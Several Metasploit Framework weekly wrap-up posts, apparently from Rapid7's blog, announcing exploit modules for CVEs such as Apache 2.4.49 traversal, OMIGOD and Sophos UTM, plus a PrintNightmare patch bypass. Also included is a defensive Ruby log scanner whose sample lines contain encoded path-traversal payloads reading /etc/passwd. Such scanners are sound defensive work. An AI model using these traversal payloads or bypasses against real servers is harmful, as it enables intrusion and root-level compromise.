  • #16112 from zeroSteiner – This updates the PHP Meterpreter’s delete dir functionality to recursively delete directories, and adds validation to the getsystem command on Windows Meterpreter.
  • #16113 from bcoles – A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.
  • #16132 from red0xff – Enhancements to the MySQL injection library's blind injection techniques now avoid use of the < and > characters to improve compatibility.

Bugs fixed

  • #16025 from 3V3RYONE – This fixes an issue with msfdb init on Windows when opting not to initialize web services.
  • #16066 from sjanusz-r7 – This fixes a bug where Meterpreter scripts did not correctly receive arguments as part of the sessions command. Note that Meterpreter scripts are deprecated and have been replaced with Post modules.
  • #16109 from bcoles – This fixes a crash in post/windows/gather/enum_domains when no domains are found.
  • #16114 from bcoles – A bug existed in PayloadGenerator::prepend_nops whereby if no Nops modules existed for the target payload architecture, the payload would be vaporized and replaced with an array of Nop modules as a string. This was fixed. Now if no Nop modules exist for the target payload architecture, the raw shellcode is returned unmodified.
  • #16119 from mrshu – This change fixes an incorrect user-agent in modules/auxiliary/dos/http/slowloris.py.
  • #16123 from AtmegaBuzz – This fixes the missing full disclosure reference URL in the exploit/linux/http/cisco_ucs_rce module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/10/29/metasploit-wrap-up-136/

OMIGOD It’s RCE

We are excited to announce that we now have a module for the OMIGOD vulnerability that exploits CVE-2021-38647 courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain root level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you’re patched, lest your servers decide to join the zombie horde this Halloween!

Sophos Contributes to the RCE Pile

Continuing the trend of unauthenticated RCE exploits that grant root level code execution, this week we also have an exploit for CVE-2020-25223, an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven’t yet seen exploitation in the wild of this bug, this is definitely one to patch given its severity. Stay frosty folks!

Guess Who’s Back, Back Again, Apache’s Back, Tell a Friend

Whilst not a marshalling bug (I'm sorry, it's Halloween, some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien) have added a scanner and exploit for CVE-2021-41773 and CVE-2021-42013, based on work from RootUp, ProjectDiscovery, and HackerFantastic. Path traversal vulnerabilities are relatively easy to exploit, and this got a lot of attention in the news since it's been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you're running any Apache servers. Successful exploitation will result in remote code execution as the user running the Apache server.
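A defender-side check for the traversal pattern behind these two CVEs, written here as an added example (it is not the Metasploit scanner or exploit module): it walks constructed access-log lines, percent-decodes each request path repeatedly, and flags requests that only escape the document root after decoding. The `.%2e` and double-encoded `%%32%65` sequences are the publicly documented encodings for CVE-2021-41773 and CVE-2021-42013; the log lines, IPs and timestamps are constructed.

```ruby
# Constructed combined-log-format lines (not real traffic) for the scanner below.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [06/Oct/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 1043
  10.0.0.7 - - [06/Oct/2021:10:12:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1234
  10.0.0.9 - - [06/Oct/2021:10:12:09 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1234
  10.0.0.3 - - [06/Oct/2021:10:12:11 +0000] "GET /images/../index.html HTTP/1.1" 200 1043
LOG

# Client IP, method and request target of a combined-log-format line.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# One round of percent-decoding; malformed escapes are left untouched.
def percent_decode(str)
  str.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# Decode repeatedly (bounded) so a double-encoded %%32%65 resolves to "." as well.
def fully_decode(path, max_rounds: 3)
  max_rounds.times do
    decoded = percent_decode(path)
    break if decoded == path
    path = decoded
  end
  path
end

# Walk the path segments with a depth counter; true if a ".." pops past the root.
def escapes_root?(path)
  depth = 0
  path.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    if seg == '..'
      depth -= 1
      return true if depth < 0
    else
      depth += 1
    end
  end
  false
end

# The vulnerability is a normalize-before-decode gap: the raw target carries no ".."
# segment (so normalization lets it through), yet the decoded path escapes the root.
def suspicious_traversal?(target)
  raw_path = target.split('?', 2).first
  return false if raw_path.split('/').include?('..')
  escapes_root?(fully_decode(raw_path))
end

# Returns one hash per flagged request, in log order.
def scan_access_log(text)
  text.each_line.filter_map do |line|
    m = LOG_LINE.match(line) or next
    next unless suspicious_traversal?(m[:target])
    { ip: m[:ip], method: m[:method], target: m[:target], decoded: fully_decode(m[:target]) }
  end
end
```

A plain `/images/../index.html` is deliberately not flagged, since the server normalizes that case safely; the check is specific to traversal that appears only after decoding.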

New module content (6)

  • Squid Proxy Range Header DoS by Joshua Rogers, which exploits CVE-2021-31806 and CVE-2021-31807 – This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
  • Apache 2.4.49/2.4.50 Traversal RCE scanner by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-41773 and CVE-2021-42013 – This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
  • Sophos UTM WebAdmin SID Command Injection by wvu and Justin Kennedy, which exploits CVE-2020-25223 – This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the root user.
  • Microsoft OMI Management Interface Authentication Bypass by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits CVE-2021-38647 – We added an unauthenticated RCE exploit for Microsoft OMI "OMIGOD" CVE-2021-38647. Successful exploitation grants code execution as the root user.
  • Apache 2.4.49/2.4.50 Traversal RCE by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-41773 and CVE-2021-42013 – This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
  • Browse the session filesystem in a Web Browser by timwr – This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.

Enhancements and features

  • #15681 from smashery – This adds support for reverse port forwarding via established SSH sessions.
  • #15778 from k0pak4 – This PR adds documentation for the http trace scanner.
  • #15788 from zeroSteiner – When a generated PowerShell command payload would exceed the maximum length allowed for successful execution, gracefully fall back to omitting the AMSI bypass.
  • #15803 from k0pak4 – This adds f5_bigip_virtual_server scanner documentation.

Bugs fixed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest version of Metasploit Framework. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/

Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product from Sage Group, designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well, wait no more: thanks to the work of Aaron Herndon, Jonathan Peterson, William Vu, Cale Black, and Ryan Villarreal, along with work from community contributor deadjakk, Metasploit now has an exploit module for CVE-2020-7388 and CVE-2020-7387 that allows unauthenticated attackers to gain SYSTEM level code execution on affected versions of Sage X3. This module should prove very useful on engagements, both as a way to gain an initial foothold in a target network and as a way to elevate privileges to allow for more effective pivoting throughout the target network. More information on these vulnerabilities can be found in our detailed writeup post on our blog.

Help My Server is Raining Keys

Another great module that landed this week was an exploit for CVE-2021-27850 from Johannes Mortiz and Yann Castel aka Hakyac, which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications as it is often used to sign important data within the application. However, in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonsBeanutils1 from ysoserial. Therefore this should be one to keep an eye out for and patch if you haven't already.

PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to Spencer McIntyre to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the \??\UNC\ bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit’s DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

New module content (4)

Enhancements and features

  • #15403 from pingport80 – This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
  • #15409 from zeroSteiner – An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to automatically convert UNC paths to the \??\UNC\host\path\to\dll format to bypass the second and most recent patch at the time of writing. Additionally, a bug was fixed in the DCERPC library where data that was read would be incomplete when the response did not fit into a single fragment, ensuring that the PrintNightmare module can now read long responses from the target, such as when enumerating the installed printer drivers.
  • #15440 from bwatters-r7 – This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490.

Bugs fixed

  • #14683 from gwillcox-r7 – This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
  • #15436 from sjanusz-r7 – Ensure that generated variable names aren’t Java keywords
  • #15443 from dwelch-r7 – Adds python3 support for the wmiexec external module auxiliary/scanner/smb/impacket/wmiexec
  • #15445 from zeroSteiner – Updates msfconsole’s output logs to only show the target’s ip when an exploit module is run, rather than a host-hash

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2020/12/18/metasploit-wrap-up-92/

It’s the week of December 17th and that can only mean one thing: a week until Christmas! For those of you who don’t celebrate Christmas, a very happy Hanukkah/Chanukah, Kwanzaa, Diwali, Chinese New Year, Winter Solstice and Las Posadas to you all!

This is our last weekly wrap-up this year, but as always, we’ll be publishing an annual Metasploit wrap-up just after the new year that covers all the shells we got in 2020.

Without further ado, let’s jump into it!

CVE-2020-1054: I heard you still got Windows 7, so let’s play a game

Oh dear Windows 7, you just can't catch a break. timwr continued his LPE contributions this week with an exploit for CVE-2020-1054, an OOB write vulnerability via the DrawIconEx() function in win32k.sys. This bug was originally found by bee13oy of Qihoo 360 Vulcan Team and Netanel Ben-Simon and Yoav Alon of Check Point Research and was reported to Microsoft in May 2020. The module targets Windows 7 SP1 x64 and grants SYSTEM level code execution. Whilst Windows 7 is EOL, it is still being used by 17.68% of all Windows computers as of November 2020 according to some statistics. That is still a fair market share even if its popularity has been gradually diminishing over time. Furthermore, although users can update Windows 7, it is now mostly a manual process unless you are on one of Windows' extended support plans. This increases the time needed to apply patches and also increases the possibility that users may forget to install specific patches. Hopefully none of your clients' systems are still running Windows 7, but in case you are on a pen test and happen to encounter one, this exploit might provide the access you need to pivot further into the network.

Parse me to your shell

The second highlight of this week was a PR from our very own wvu-r7 targeting CVE-2020-14871, a buffer overflow within the parse_user_name() function of the PAM (Pluggable Authentication Module) component of Solaris SunSSH running on Oracle Solaris versions 10 and 11. The exploit supports SunSSH 1.1.5 running on Solaris 10u11 1/13 (x86) within either VMware or VirtualBox and grants unauthenticated users a shell as the root user. Pretty nifty stuff!

New modules (2)

Enhancements and features

Bugs fixed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).